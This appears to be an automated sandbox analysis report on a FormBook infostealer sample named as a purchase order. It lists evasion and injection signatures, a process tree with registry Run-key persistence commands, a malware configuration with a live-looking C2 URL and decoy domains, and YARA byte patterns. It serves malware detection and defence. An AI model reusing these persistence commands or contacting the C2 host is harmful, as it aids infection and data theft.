Edit tour

Windows Analysis Report
PURCHASED ORDER OF ENG091.exe

Overview

General Information

Sample name:	PURCHASED ORDER OF ENG091.exe
Analysis ID:	1528882
MD5:	30ecd7046839af0716977a9ef6047e60
SHA1:	a1f6517726c9dc0f3d588b947e2aaeb4f849f58c
SHA256:	472a703381c8fe89f83b0fe4d7960b0942c5694054ba94dd85c249c4c702e0cd
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Drops PE files with a suspicious file extension

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: CMSTP Execution Process Creation

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Process Tree

System is w10x64

PURCHASED ORDER OF ENG091.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 6332 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3984 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

Conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3004 cmdline: cmd /c Copy "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmstp.exe (PID: 5552 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)

cmd.exe (PID: 5536 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PURCHASED ORDER OF ENG091.pif (PID: 5728 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 4632 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4620 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 5424 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmmon32.exe (PID: 4620 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)

PURCHASED ORDER OF ENG091.pif (PID: 4872 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 3560 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6244 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 6280 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

msdt.exe (PID: 3700 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)

PURCHASED ORDER OF ENG091.pif.pif (PID: 3004 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 5728 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5272 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 2948 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Conhost.exe (PID: 2948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msdt.exe (PID: 6540 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)

PURCHASED ORDER OF ENG091.pif.pif (PID: 3924 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 1428 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6324 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 4136 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

rundll32.exe (PID: 1824 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

PURCHASED ORDER OF ENG091.pif.pif.pif (PID: 5128 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 5916 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6848 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 2948 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

wlanext.exe (PID: 3632 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)

PURCHASED ORDER OF ENG091.pif.pif.pif (PID: 2264 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 6048 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3136 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 1088 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

msdt.exe (PID: 5748 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)

PURCHASED ORDER OF ENG091.pif.pif.pif.pif (PID: 2704 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 4136 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2540 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 1776 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

chkdsk.exe (PID: 6488 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

PURCHASED ORDER OF ENG091.pif.pif.pif.pif (PID: 6648 cmdline: "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" MD5: 30ECD7046839AF0716977A9EF6047E60)

cmd.exe (PID: 2792 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4972 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 5092 cmdline: cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

netsh.exe (PID: 5096 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9ba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x990a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5829:$sqlite3step: 68 34 1C 7B E1 0x593c:$sqlite3step: 68 34 1C 7B E1 0x5858:$sqlite3text: 68 38 2A 90 C5 0x597d:$sqlite3text: 68 38 2A 90 C5 0x586b:$sqlite3blob: 68 53 D8 7F 8C 0x5993:$sqlite3blob: 68 53 D8 7F 8C
00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5a79:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c3c8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa1f7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x150df:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x93aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14edd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x149c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14fdf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15157:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9dc2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13c44:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xaabb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b12f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c132:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18051:$sqlite3step: 68 34 1C 7B E1 0x18164:$sqlite3step: 68 34 1C 7B E1 0x18080:$sqlite3text: 68 38 2A 90 C5 0x181a5:$sqlite3text: 68 38 2A 90 C5 0x18093:$sqlite3blob: 68 53 D8 7F 8C 0x181bb:$sqlite3blob: 68 53 D8 7F 8C
0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5f71:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c8c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa6ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x155d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
